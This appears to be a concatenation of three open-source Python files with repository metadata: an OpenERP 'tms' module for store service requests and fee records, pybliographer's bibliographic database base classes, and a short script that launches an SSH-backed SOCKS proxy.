"province_id":fields.many2one("res.country.state", string="Province",store=True,required=True,domain=[('country_id','=',49)]),
"address":fields.char(string="Address", size=200),
"contactperson":fields.char(string="Contact Person", size=100),
"telephone":fields.char(string="Telephone", size=50),
"mobile":fields.char(string="Mobile", size=50),
"netusername":fields.char(string="Net User Name", size=60),
"netuserpass":fields.char(string="Net User pwd", size=60),
"dynamicdomain":fields.char(string="Dynamic Domain", size=200),
"dynamicdomainpass":fields.char(string="Dynamic Domain pass", size=100),
"dynamicdomainaddress":fields.char(string="Dynamic Domain Address", size=100),
"dynamicdomainotheraddress":fields.char(string="Domain Other Address", size=100),
"peanutuserpass":fields.char(string="Peanut User pass", size=100),
"peanutdomain":fields.char(string="花生壳域名",size=100),
"peanutdomainaddress":fields.char(string="花生壳域名地址",size=100),
"peanutvalidemail":fields.char(string="Peanut valid email", size=100),
"peanutemailpass":fields.char(string="Peanut email pass", size=100),
"poscdk":fields.char(string="POSCDK", size=200),
"remark":fields.text(string="Remark")
}
_sql_constraints = [('storenum_uniq', 'unique(storenum)', 'Storenum must be unique!')]
Store()
class ApplyInfo(osv.osv):
_name="tms.applyinfo"
def get_province_name(self,cr,uid,ids,name,args,context=None):
result=dict.fromkeys(ids,'None')
for item in self.browse(cr,uid,ids,context=context):
result[item.id] = item.store_id.province_id.name
return result
def get_province_by_store_id(self,cr,uid,store_id,context=None):
if not store_id:
return False
pitem = self.pool.get("tms.store").browse(cr,uid,store_id,context=context)
if not pitem:
return False
return pitem.province_id.name
def on_change_store(self,cr,uid,ids,model_id,context=None):
if not model_id:
return False
item = self.pool.get("tms.store").browse(cr,uid,model_id,context=context)
if not item :
return False
return {
"value":{
"province":self.get_province_by_store_id(cr,uid,item.id),
"storenum":item.storenum,
"telephone":item.telephone,
"mobile":item.mobile,
"address":item.address,
"contactperson":item.contactperson
}
}
def _get_default_processid(self,cr,uid,code,context):
sequenceid=self.pool.get("ir.sequence").search(cr,uid,[('code','=',code)])
sequence = self.pool.get("ir.sequence").browse(cr,uid,sequenceid,context=None)
return sequence[0].get_id()
def create(self,cr,uid,data,context=None):
apply_id = super(ApplyInfo, self).create(cr, uid, data, context=context)
print "apply_id=%s"%apply_id
#print context
childtypename = type(self).__name__
print childtypename
processid = self._get_default_processid(cr,uid,"tms.applyinfo.processid",context)
state = "unreceived"
if childtypename=="tms.stopandmoveapplyinfo":
print "stop and move"
processid = self._get_default_processid(cr,uid,"tms.stopmoveapplyinfo.processid",context)
state = "hasconfirm"
print "create state is %s"% state
self.write(cr,uid,apply_id,{"state":state,"processid":processid},context)
#self.write(cr,uid,apply_id,{"state":"hasconfirm"},context)
return apply_id
def name_get(self,cr,uid,ids,context=None):
res = []
for item in self.browse(cr,uid,ids,context):
res.append((item.id,item.processid))
return res
"""def write(self,cr,uid,ids,values,context=None):
print "call write method,parammeter values are %s" % values
childtypename = type(self).__name__
if childtypename =="tms.stopandmoveapplyinfo":
return super(ApplyInfo,self).write(cr,uid,ids,values,context)
if self.user_has_groups(cr,uid,"tms.group_tms_applyinfo_factory",context):
applyinfo_state = set([item.state for item in self.browse(cr,uid,ids,context)])
current_state = applyinfo_state.pop()
if len(applyinfo_state)==0 and( current_state=="unreceived" or current_state=='draft'):
return super(ApplyInfo,self).write(cr,uid,ids,values,context)
else:
raise osv.except_osv(_("Operation Canceld"),u"你只能修改未接收申报!")
return super(ApplyInfo,self).write(cr,uid,ids,values,context)
"""
def unlink(self,cr,uid,ids,context=None):
childtypename = type(self).__name__
if childtypename!='tms.stopandmoveapplyinfo' and self.user_has_groups(cr,uid,"tms.group_tms_applyinfo_factory",context):
applyinfo_state = set([item.state for item in self.browse(cr,uid,ids,context)])
if len(applyinfo_state)>1 or applyinfo_state.pop()!="unreceived":
raise osv.except_osv(_("Operation Canceld"),u"你只能删除未接收申报!")
return super(ApplyInfo,self).unlink(cr,uid,ids,context)
_columns = {
"user_id":fields.many2one("res.users",string="Add Man"),
"processid":fields.char(string="ProcessId",size=100,required=False),
"store_id":fields.many2one("tms.store",string="Sotre",required=True),
"province":fields.function(get_province_name,type="char",string="Province",store=True),
"storenum":fields.related("store_id","storenum",type="char",string="Store Num"),
"telephone":fields.related("store_id","telephone",type="char",string="telephone"),
"mobile":fields.related("store_id","mobile",type="char",string="mobile"),
"address":fields.related("store_id","address",type="char",string="Address"),
"contactperson":fields.related("store_id","contactperson",type="char",string="Contact Person"),
"content":fields.text(string="Content",required=True),
"applyinfoitem_ids":fields.one2many("tms.applyinfoitem","applyinfo_id",string="ApplyInfo Items"),
"create_time":fields.date(string="Create Time"),
"state":fields.selection([("draft","Draft"),("unreceived","UnReceived"),("hasreceived","HasReceived"),
("hasdone","HasDone"),("hasconfirm","HasConfirm")],string="State",required=True,readonly=True),
}
def applyinfo_unreceived(self,cr,uid,ids,args=None,context=None):
self.write(cr,uid,ids,{'state':'unreceived'})
return True
def applyinfo_hasreceived(self,cr,uid,ids,args=None,context=None):
self.write(cr,uid,ids,{'state':'hasreceived'})
return True
def applyinfo_hasdone(self,cr,uid,ids,args=None,context=None):
self.write(cr,uid,ids,{'state':'hasdone'})
return True
def applyinfo_hasconfirm(self,cr,uid,ids,args=None,context=None):
self.write(cr,uid,ids,{'state':'hasconfirm'})
return True
_order = "processid desc"
_defaults={
#"processid":_get_default_processid,
"user_id":lambda self,cr,uid,context:uid,
"create_time":lambda self,cr,uid,context:datetime.datetime.now().strftime("%Y-%m-%d"),
"state":lambda self,cr,uid,context:"draft",
}
ApplyInfo()
class ApplyInfoItem(osv.osv):
_name="tms.applyinfoitem"
_order="create_time asc"
_columns={
"name":fields.text(string="Remark"),
"user_id":fields.many2one("res.users",string="Add Man"),
"create_time":fields.datetime(string="Add time"),
"applyinfo_id":fields.many2one("tms.applyinfo",string="ApplyInfo"),
}
_defaults={
"user_id":lambda self,cr,uid,context:uid,
"create_time":lambda self,cr,uid,context:datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'),
}
ApplyInfoItem()
class StopAndMoveApplyInfo(osv.osv):
_name="tms.stopandmoveapplyinfo"
_inherit="tms.applyinfo"
_columns={
"applyinfotype":fields.selection([("move","Move"),("offnet","Off Net"),("powercut","Power Cut"),
("govermentcheck","Goverment Check"),("duetoeletricity","Due to electricity"),
("duetonet","Due to net"),("duetohouse","Due to House"),("other","Other")
],string="ApplyInfo Type",required=True),
"create_time":fields.datetime(string="Create Time"),
"content":fields.text(string="Content",required=False),
}
_defaults={
"user_id":lambda self,cr,uid,context:uid,
"state":lambda self,cr,uid,context:"hasconfirm",
"create_time":lambda self,cr,uid,context:time.strftime('%Y-%m-%d %H:%M:%S',time.localtime()),
}
StopAndMoveApplyInfo()
class FeeType(osv.osv):
"""
费用类别
"""
_name = "tms.feetype"
_columns={
"name":fields.char(string="Name", size=100,required=True),
"code":fields.char(string="Code",size=100,required=True),
"remark":fields.char(string="Remark",size=300,required=False)
}
_sql_constraints = [('name_uniq', 'unique(name)', 'FeeType name must be unique!'),
('code_uniq','unique(code)','FeeType code must be unique!')
]
FeeType()
class SendCompany(osv.osv):
"""
快递公司
"""
_name="tms.sendcompany"
_columns={
"name":fields.char(string="Company Name",size=100,required=True),
"remark":fields.char(string="Remark",size=300)
}
_sql_constraints = [('name_uniq', 'unique(name)', 'SendCompany name must be unique!')]
SendCompany()
class FeeBase(osv.osv):
"""
费用基本类型,作为维护费用来使用
"""
_name="tms.feebase"
def get_province_name(self,cr,uid,ids,name,args,context=None):
print "get_province_name ,ids is %s "% ids
result=dict.fromkeys(ids,'None')
print self.browse(cr,uid,ids,context= context )
for item in self.browse(cr,uid,ids,context=context):
result[item.id] = item.store_id.province_id.name
#print item.productname
#result[item.id] = ''
return result
def _get_default_processid(self,cr,uid,code,context):
sequenceid=self.pool.get("ir.sequence").search(cr,uid,[('code','=',code)])
sequence = self.pool.get("ir.sequence").browse(cr,uid,sequenceid,context=None)
return sequence[0].get_id()
def on_change_store(self,cr,uid,ids,model_id,context=None):
if not model_id:
return False
item = self.pool.get("tms.store").browse(cr,uid,model_id,context=context)
if not item :
return False
return {
"value":{
"province":self.get_province_by_store_id(cr,uid,item.id),
"storenum":item.storenum,
}
}
def get_province_by_store_id(self,cr,uid,store_id,context=None):
if not store_id:
return False
pitem = self.pool.get("tms.store").browse(cr,uid,store_id,context=context)
if not pitem:
return False
return pitem.province_id.name
def name_get(self,cr,uid,ids,context=None):
res = []
for item in self.browse(cr,uid,ids,context):
res.append((item.id,item.processid))
return res
def _get_accountperiod_list(self,cr,uid,context=None):
"""
暂时不使用,账期由入账时间直接生成
"""
res=[]
for index in range(-6,6):
item = utildate.getyearandmonth(index)
period = ("%s%s"%(item[0],item[1]))
res.append((period,period))
return res
def create(self,cr,uid,data,context=None):
print "create productforit ,data is %s" % data
if type(data['store_id']) is list:
data["store_id"] = data["store_id"][0]
feebase_id = super(FeeBase, self).create(cr, uid, data, context=context)
childtypename = type(self).__name__
processid = ""
if childtypename=="FeeBase":
processid = self._get_default_processid(cr,uid,'tms.feebase.processid',context)
elif childtypename =="tms.feeforsend":
processid = self._get_default_processid(cr,uid,'tms.feeforsend.processid',context)
elif childtypename=="tms.feeforproduct":
processid = self._get_default_processid(cr,uid,'tms.feeforproduct.processid',context)
elif childtypename=="tms.feeforproductit":
processid = self._get_default_processid(cr,uid,'tms.feeforproductit.processid',context)
elif childtypename=="tms.feeforitservice":
processid = self._get_default_processid(cr,uid,'tms.feeforitservice.processid',context)
elif childtypename=="tms.feeforother":
processid = self._get_default_processid(cr,uid,'tms.feeforother.processid',context)
self.write(cr,uid,feebase_id,{"accountperiod":data['feedate'][0:7].replace('-',''),"processid":processid},context)
return feebase_id
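    # Illustrative (added comment): a feedate of '2013-05-10' gives the
    # accounting period '201305' via data['feedate'][0:7].replace('-','').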
def export_data(self,cr,uid,ids,fields_to_export,context=None):
print fields_to_export
print "User have tms.group_tms_fee_finance %s" % self.user_has_groups(cr,uid,"tms.group_tms_fee_finance",context)
if not self.user_has_groups(cr,uid,"tms.group_tms_fee_finance",context):
if "amount" in fields_to_export:
fields_to_export.remove("amount")
if "productprice" in fields_to_export:
fields_to_export.remove("productprice")
if "productcount" in fields_to_export:
fields_to_export.remove("productcount")
return super(FeeBase,self).export_data(cr,uid,ids,fields_to_export,context)
    def write(self,cr,uid,ids,values,context=None):
        print "call write method, parameter values are %s" % values
        if not self.user_has_groups(cr,uid,"tms.group_tms_fee_finance",context):
            # non-finance users may only write the OA number together with the
            # state; the original "len(values)!=2 and ..." test let any
            # two-field write through
            if sorted(values.keys())!=sorted(['oanum','state']):
                raise osv.except_osv(_("Operation Canceled"),u"You do not have permission to modify!")
        return super(FeeBase,self).write(cr,uid,ids,values,context)
def _check_fee_state(self,cr,uid,ids,oldstate,targetstate,context=None):
model_id = context["active_model"]
model=self.pool.get(model_id)
items = model.browse(cr,uid,ids,context=context)
if targetstate!='hasback' and any([item.state!=oldstate for item in items]):
raise osv.except_osv(_('Operation Canceld'),_('Only '+oldstate+' fee can be exported!'))
for item in items:
model.write(cr,uid,item.id,{"state":targetstate})
return True
def _check_is_finance(self,cr,uid):
uitem=self.pool.get("res.users").browse(cr,uid,uid)
groupnames = [item.name for item in uitem.groups_id]
print groupnames
if "Finance Fee Manager" not in groupnames:
raise osv.except_osv(_('Operation Canceld'),_('You are not Finance Fee Manager!'))
def export_to_account(self,cr,uid,ids,context=None):
self._check_is_finance(cr,uid)
return self._check_fee_state(cr,uid,ids,'draft','hasexported',context=context)
def set_to_hasback(self,cr,uid,ids,context=None):
self._check_is_finance(cr,uid)
return self._check_fee_state(cr,uid,ids,'hasoa','hasback',context=context)
_columns={
"processid":fields.char(string="ProcessId",size=100,required=False),
"applyprocessid":fields.char(string="ApplyInfo Num",size=100,required=False),
"feedate":fields.date(string="Fee Date"),
"store_id":fields.many2one("tms.store",string="Store"),
"storenum":fields.related("store_id","storenum",type="char",string="Store Num"),
"province":fields.function(get_province_name,type="char",string="Province",store=True),
"feetype_id":fields.many2one("tms.feetype","Fee Type"),
"payman":fields.many2one("res.users","Pay Man"),
"amount":fields.float(string="Amount"),
"accountamount":fields.float(string="Account Amount"),
"accountperiod":fields.char(string="Account Period", size=20,required=False),
"oanum":fields.char(string="OA Num",size=100),
"feecontent":fields.char(string="Fee Content",size=100),
"remark":fields.text(string="Remark"),
"state":fields.selection([("draft","Draft"),("hasexported","Has Exported"),("hasoa","Has Input OANum"),("hasback","Has Back")],
string="States"),
}
_order = "processid desc"
_defaults={
"feedate":lambda self,cr,uid,context:datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
"payman":lambda self,cr,uid,context:uid,
"state":lambda self,cr,uid,context:'draft',
"feecontent":lambda self,cr,uid,context:'上门服务费',
}
FeeBase()
class FeeForSend(osv.osv):
_inherit="tms.feebase"
_name = "tms.feeforsend"
_columns={
"sendcompany":fields.many2one("tms.sendcompany","Send Company"),
"sendordernum":fields.char(string="Send Order num",size=100,required=True),
"sendproduct":fields.char(string="Send Product", size=200,required=True),
}
FeeForSend()
class FeeForProduct(osv.osv):
_inherit="tms.feebase"
_name = "tms.feeforproduct"
def on_change_productaccount(self,cr,uid,ids,productcount,productprice,context=None):
return {
"value":{
"amount":productcount*productprice,
"accountproductprice":productprice,
"accountproductcount":productcount,
"accountamount":productcount*productprice,
}
}
def on_change_accountproductaccount(self,cr,uid,ids,accountproductcount,accountproductprice,context=None):
return {
"value":{
"accountamount":accountproductprice*accountproductcount,
}
}
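    # Example (added comment): entering productcount=3 and productprice=25
    # makes the first onchange fill amount=75 and copy both values into the
    # account* fields; the second onchange then recomputes accountamount
    # whenever the account* values are edited.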
_columns={
"productname":fields.char(string="Product Name",size=200),
"producttype":fields.char(string="Product Type",size=100),
"productprice":fields.float(string="Product Price"),
"productcount":fields.integer(string="Product Count"),
"accountproductprice":fields.integer(string="Account Product Price"),
"accountproductcount":fields.integer(string="Account Product Count")
}
FeeForProduct()
class FeeForProductIt(osv.osv):
_inherit="tms.feebase"
_name = "tms.feeforproductit"
def on_change_productaccount(self,cr,uid,ids,productcount,productprice,context=None):
return {
"value":{
"amount":productcount*productprice,
"accountproductprice":productprice,
"accountproductcount":productcount,
"accountamount":productcount*productprice,
}
}
def on_change_accountproductaccount(self,cr,uid,ids,accountproductcount,accountproductprice,context=None):
return {
"value":{
"accountamount":accountproductprice*accountproductcount,
}
}
_columns={
"productname":fields.char(string="Product Name",size=200),
"producttype":fields.char(string="Product Type",size=200),
"productprice":fields.float(string="Product Price",groups="tms.group_tms_fee_finance"),
"productcount":fields.integer(string="Product Count",groups="tms.group_tms_fee_finance"),
"accountproductprice":fields.integer(string="Account Product Price",groups="tms.group_tms_fee_accout,tms.group_tms_fee_finance"),
"accountproductcount":fields.integer(string="Account Product Count",groups="tms.group_tms_fee_accout,tms.group_tms_fee_finance")
}
FeeForProductIt()
class FeeForItService(osv.osv):
_inherit="tms.feebase"
_name = "tms.feeforitservice"
FeeForItService()
class FeeForOther(osv.osv):
_inherit="tms.feebase"
_name = "tms.feeforother"
FeeForOther()
|
3dfxsoftware/cbss-addons
|
tms/tms.py
|
Python
|
gpl-2.0
| 21,758
|
# This file is part of pybliographer
#
# Copyright (C) 1998-2004 Frederic GOBRY
# Email : gobry@pybliographer.org
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
#
''' This module contains the base classes one might want to inherit
from in order to provide a new database format '''
from string import *
import re, copy, os
import Legacy.Help
from types import *
from Legacy import Autoload, Config, Iterator, Key, Open, Selection, Utils
from shutil import copyfile
class Entry:
    '''
    A database entry. It behaves like a dictionary, which
    returns an instance of Description for each key. For example,
    entry ['author'] is expected to return a Types.AuthorGroup
    instance.
    Each entry class must define a unique ID, which is used
    during conversions.
    The entry.key is an instance of Key, and has to be unique over
    the whole application.
    The entry.type is an instance of Types.EntryDescription. It
    links the field names with their type.
    '''
id = 'VirtualEntry'
def __init__ (self, key = None, type = None, dict = None):
self.type = type
self.dict = dict or {}
self.key = key
return
def keys (self):
''' returns all the keys for this entry '''
return self.dict.keys()
    def has_key (self, key):
        return self.dict.has_key(key)
def field_and_loss (self, key):
        ''' return field with indication of conversion loss '''
return self.dict[key], 0
def __getitem__ (self, key):
''' return text representation of a field '''
return self.field_and_loss(key)[0]
def get(self, key, default=None):
if self.has_key(key):
return self[key]
else:
return default
def __setitem__(self, name, value):
self.dict[name] = value
return
def __delitem__(self, name):
del self.dict[name]
return
def __add__(self, other):
''' Merges two entries, key by key '''
ret = Entry (self.key, self.type, {})
        # take our own fields first
for f in self.keys():
ret[f] = self[f]
        # then add the ones we do not have yet
for f in other.keys():
if not self.has_key(f):
ret[f] = other[f]
return ret
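    # Illustrative merge (added comment):
    #   a = Entry(dict={'author': 'Smith', 'year': '1998'})
    #   b = Entry(dict={'year': '2001', 'title': 'Foo'})
    #   (a + b)['year']  == '1998'   # left operand wins on conflicts
    #   (a + b)['title'] == 'Foo'    # missing fields come from the right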
def __repr__(self):
''' Internal representation '''
return 'Entry (%s, %s, %s)' % (`self.key`, `self.type`, `self.dict`)
def __str__(self):
''' Nice standard entry '''
tp = self.type.name
fields = self.type.fields
try:
text = '%s [%s]\n' % (tp, self.key.key)
except AttributeError:
text = '%s [no key]\n' %(tp)
text = text + ('-' * 70) + '\n'
dico = self.keys ()
for f in fields:
name = f.name
lcname = lower(name)
if not self.has_key(lcname):
continue
text = text + ' %-14s ' % name
text = text + Utils.format(str(self[lcname]),
75, 17, 17) [17:]
text = text + '\n'
try:
dico.remove(lcname)
except ValueError:
raise ValueError, \
'multiple definitions of field `%s\' in `%s\'' \
% (name, tp)
for f in dico:
text = text + ' %-14s ' % f
text = text + Utils.format(str(self[f]),
75, 17, 17) [17:]
text = text + '\n'
return text
class DataBase:
    '''This class represents a full bibliographic database. It
    also looks like a dictionary, each key being an instance of
class Key.
'''
properties = {}
filemeta = {}
id ='VirtualDB'
def __init__(self, url):
''' Open the database referenced by the URL '''
self.key = url
self.dict = {}
self.file_metadata = {}
return
def has_property(self, prop):
'''Indicates if the database has a given property.'''
if self.properties.has_key (prop):
return self.properties [prop]
return True
def generate_key(self, entry):
# call a key generator
keytype = Config.get('base/keyformat').data
return Autoload.get_by_name('key', keytype).data(entry, self)
def add(self, entry):
'''Adds an (eventually) anonymous entry.'''
if entry.key is None:
entry.key = self.generate_key(entry)
else:
entry.key.base = self.key
if self.has_key(entry.key):
prefix = entry.key.key
suffix = ord ('a')
while True:
key = Key.Key(self, prefix + '-' + chr(suffix))
if not self.has_key (key):
break
suffix += 1
entry.key = key
self[entry.key] = entry
return entry
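    # Illustrative behaviour (added comment): if the generated key
    # 'smith1998' is already taken, add() retries as 'smith1998-a',
    # 'smith1998-b', ... until a free key is found.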
def new_entry(self, type):
'''Creates a new entry of the native type of the database '''
return Entry(None, type)
def keys(self):
'''Returns a list of all the keys available for the database '''
return self.dict.keys()
def has_key(self, key):
'''Tests for a given key '''
return self.dict.has_key(key)
def would_have_key(self, key):
'''Test for a key that would be set on the database '''
return self.has_key(Key.Key(self, key.key))
def __getitem__(self, key):
'''Returns the Entry object associated with the key '''
return self.dict [key]
def __setitem__ (self, key, value):
'''Sets a key Entry '''
key.base = self.key
value.key = key
self.dict[key] = value
return
def __delitem__(self, key):
'''Removes an Entry from the database, by its key '''
del self.dict[key]
return
def __len__(self):
'''Number of entries in the database '''
return len(self.keys())
def __str__(self):
'''Database representation '''
return '<generic bibliographic database (' + `len(self)` + \
' entries)>'
def __repr__(self):
'''Database representation '''
return 'DataBase (%s)' % `self.key`
def iterator(self):
''' Returns an iterator for that database '''
return Iterator.DBIterator(self)
def update(self, sorting=None):
''' Updates the Entries stored in the database '''
if self.key.url [0] != 'file':
raise IOError, "can't update the remote database `%s'" % self.key
name = self.key.url[2]
if Config.get('base/directsave').data:
if Config.get('base/backup').data:
copyfile(name, name + '.bak')
namefile = open(name, 'w')
iterator = Selection.Selection(sort=sorting).iterator(self.iterator())
Open.bibwrite(iterator, out=namefile, how=self.id, database=self)
namefile.close ()
else:
# create a temporary file for the new version
tmp = os.path.join(os.path.dirname(name),
'.#' + os.path.basename(name))
tmpfile = open(tmp, 'w')
iterator = Selection.Selection(sort=sorting).iterator(self.iterator())
Open.bibwrite(iterator, out=tmpfile, how=self.id, database=self)
tmpfile.close()
# if we succeeded, and backup is set, backup file
if Config.get('base/backup').data:
os.rename(name, name + '.bak')
# ...and bring new version online
os.rename(tmp, name)
return
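    # Note (added comment): the non-directsave branch writes to a temporary
    # '.#<name>' sibling and only renames it over the original on success,
    # so a failed write never clobbers the existing database file.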
def get_metadata(self, key, default=None):
return self.file_metadata.get(key, default)
def set_metadata(self, key, value):
self.file_metadata[key] = value
|
zkota/pyblio-1.3
|
Legacy/Base.py
|
Python
|
gpl-2.0
| 7,923
|
#!/usr/bin/env python
#-*- coding:utf-8 -*-
#Author:left_left
import socks_ssh
server = '127.0.0.1'
port = 10000
user = 'root'
password = 'password'
bind_addr = '0.0.0.0'
bind_port = 1080
t_num = 10
socks_ssh.run(server, port, user, password, bind_addr, bind_port, t_num)
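# Reading of the parameters (assumed from the names; socks_ssh itself is not
# shown here): connect to the SSH server at server:port with user/password,
# expose a local SOCKS proxy on bind_addr:bind_port, and use t_num worker
# threads.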
|
zuopucuen/ssh_socks
|
pysocks/run_socks_ssh.py
|
Python
|
gpl-2.0
| 284
|